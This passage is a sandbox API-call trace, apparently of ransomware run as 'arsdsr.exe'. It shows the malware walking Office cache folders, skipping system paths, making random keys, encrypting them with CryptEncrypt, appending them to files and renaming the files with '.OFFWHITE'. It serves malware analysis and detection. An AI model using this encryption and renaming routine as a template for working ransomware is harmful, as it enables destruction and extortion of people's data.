Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\" [0084.395] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\", lpString2="InfoPathMUI.msi" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" [0084.395] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.395] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.395] PathFindExtensionW (pszPath="InfoPathMUI.msi") returned=".msi" [0084.395] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0084.395] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0084.395] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0084.395] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0084.395] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0084.395] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0084.395] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0084.395] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0084.395] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0084.395] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0084.395] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0084.395] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0084.395] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0084.395] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0084.395] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0084.395] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e345a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x4cf, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="InfoPathMUI.xml", cAlternateFileName="INFOPA~1.XML")) returned 1 [0084.395] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2=".") returned 1 [0084.395] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="..") returned 1 [0084.396] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="...") returned 1 [0084.396] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="windows") returned -1 [0084.396] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="$recycle.bin") returned 1 [0084.396] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="rsa") returned -1 [0084.396] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="ntuser.dat") returned -1 [0084.396] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="programdata") returned -1 [0084.396] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="appdata") returned 1 [0084.396] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="program files") returned -1 [0084.396] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="program files (x86)") returned -1 [0084.396] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\" [0084.396] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\", lpString2="InfoPathMUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" [0084.396] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.396] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.396] PathFindExtensionW (pszPath="InfoPathMUI.xml") returned=".xml" [0084.396] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0084.396] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0084.396] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0084.396] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0084.396] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0084.396] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0084.396] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0084.396] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0084.396] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0084.396] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0084.396] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0084.397] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0084.397] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0084.397] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0084.397] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0084.397] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0084.397] GetProcessHeap () returned 0x500000 [0084.397] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52be90 [0084.397] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0084.397] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=1231) returned 1 [0084.397] GetProcessHeap () returned 0x500000 [0084.398] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0084.398] GetProcessHeap () returned 0x500000 [0084.398] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0084.398] GetProcessHeap () returned 0x500000 [0084.398] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0084.398] GetProcessHeap () returned 0x500000 [0084.398] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0084.398] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.398] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.398] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0084.398] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.398] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.398] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0084.398] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.398] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.398] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e310*=0x100) returned 1 [0084.398] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.398] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.398] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0084.399] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x4cf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.399] SetLastError (dwErrCode=0x0) [0084.399] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0084.405] GetLastError () returned 0x0 [0084.405] GetLastError () returned 0x0 [0084.405] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x5cf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.405] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0084.405] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x6cf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.405] WriteFile (in: hFile=0x21c, lpBuffer=0x52be90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52be90*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0084.405] GetProcessHeap () returned 0x500000 [0084.405] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4cf) returned 0x531738 [0084.405] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.405] ReadFile (in: hFile=0x21c, lpBuffer=0x531738, nNumberOfBytesToRead=0x4cf, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x531738*, lpNumberOfBytesRead=0x295e540*=0x4cf, lpOverlapped=0x0) returned 1 [0084.405] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.405] WriteFile (in: hFile=0x21c, lpBuffer=0x531738*, nNumberOfBytesToWrite=0x4cf, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x531738*, lpNumberOfBytesWritten=0x295e54c*=0x4cf, lpOverlapped=0x0) returned 1 [0084.405] GetProcessHeap () returned 0x500000 [0084.406] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531738 | out: hHeap=0x500000) returned 1 [0084.406] CloseHandle (hObject=0x21c) returned 1 [0084.410] GetProcessHeap () returned 0x500000 [0084.410] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0084.410] GetProcessHeap () returned 0x500000 [0084.410] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0084.410] GetProcessHeap () returned 0x500000 [0084.410] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0084.410] GetProcessHeap () returned 0x500000 [0084.410] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0084.410] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" [0084.410] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.OFFWHITE" [0084.410] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.offwhite")) returned 1 [0084.411] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0084.411] lstrcmpiW (lpString1="Setup.xml", lpString2=".") returned 1 [0084.411] lstrcmpiW (lpString1="Setup.xml", lpString2="..") returned 1 [0084.411] lstrcmpiW (lpString1="Setup.xml", lpString2="...") returned 1 [0084.411] lstrcmpiW (lpString1="Setup.xml", lpString2="windows") returned -1 [0084.411] lstrcmpiW (lpString1="Setup.xml", lpString2="$recycle.bin") returned 1 [0084.411] lstrcmpiW (lpString1="Setup.xml", lpString2="rsa") returned 1 [0084.411] lstrcmpiW (lpString1="Setup.xml", lpString2="ntuser.dat") returned 1 [0084.411] lstrcmpiW (lpString1="Setup.xml", lpString2="programdata") returned 1 [0084.411] lstrcmpiW (lpString1="Setup.xml", lpString2="appdata") returned 1 [0084.411] lstrcmpiW (lpString1="Setup.xml", lpString2="program files") returned 1 [0084.411] lstrcmpiW (lpString1="Setup.xml", lpString2="program files (x86)") returned 1 [0084.411] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\" [0084.411] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\", lpString2="Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" [0084.411] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.411] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.411] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0084.411] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0084.411] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0084.411] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0084.412] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0084.412] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0084.412] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0084.412] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0084.412] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0084.412] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0084.412] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0084.412] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0084.412] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0084.412] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0084.412] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0084.412] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0084.412] lstrcmpiW (lpString1="Setup.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0084.412] GetProcessHeap () returned 0x500000 [0084.412] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547bb8 [0084.412] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0084.412] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=1852) returned 1 [0084.412] GetProcessHeap () returned 0x500000 [0084.412] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0084.413] GetProcessHeap () returned 0x500000 [0084.413] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0084.413] GetProcessHeap () returned 0x500000 [0084.413] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0084.413] GetProcessHeap () returned 0x500000 [0084.413] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0084.413] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.413] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.413] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0084.413] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.413] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.413] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0084.413] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.413] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.413] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0084.413] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.413] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.413] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0084.414] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x73c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.414] SetLastError (dwErrCode=0x0) [0084.414] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0084.436] GetLastError () returned 0x0 [0084.436] GetLastError () returned 0x0 [0084.436] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x83c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.436] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0084.436] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x93c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.436] WriteFile (in: hFile=0x21c, lpBuffer=0x547bb8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547bb8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0084.436] GetProcessHeap () returned 0x500000 [0084.436] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x73c) returned 0x546980 [0084.436] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.436] ReadFile (in: hFile=0x21c, lpBuffer=0x546980, nNumberOfBytesToRead=0x73c, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesRead=0x295e540*=0x73c, lpOverlapped=0x0) returned 1 [0084.437] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.437] WriteFile (in: hFile=0x21c, lpBuffer=0x546980*, nNumberOfBytesToWrite=0x73c, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesWritten=0x295e54c*=0x73c, lpOverlapped=0x0) returned 1 [0084.437] GetProcessHeap () returned 0x500000 [0084.437] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546980 | out: hHeap=0x500000) returned 1 [0084.437] CloseHandle (hObject=0x21c) returned 1 [0084.438] GetProcessHeap () returned 0x500000 [0084.438] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0084.438] GetProcessHeap () returned 0x500000 [0084.438] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0084.438] GetProcessHeap () returned 0x500000 [0084.438] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0084.438] GetProcessHeap () returned 0x500000 [0084.438] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0084.438] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" [0084.438] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" [0084.438] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.offwhite")) returned 1 [0084.447] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0084.447] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0084.448] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="{90140000-0054-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9EA85~1")) returned 1 [0084.448] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0084.448] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0084.448] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="...") returned 1 [0084.448] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="windows") returned -1 [0084.448] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="$recycle.bin") returned 1 [0084.448] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="rsa") returned -1 [0084.448] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="ntuser.dat") returned -1 [0084.448] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="programdata") returned -1 [0084.448] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="appdata") returned -1 [0084.448] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="program files") returned -1 [0084.448] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="program files (x86)") returned -1 [0084.448] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/MSOCache\\All Users\\" | out: lpString1="C:/MSOCache\\All Users\\") returned="C:/MSOCache\\All Users\\" [0084.448] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\", lpString2="{90140000-0054-0409-1000-0000000FF1CE}-C" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C") returned="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C" [0084.448] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\" [0084.448] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\" [0084.448] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*.*") returned="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*.*" [0084.448] FindFirstFileW (in: lpFileName="C:/MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, 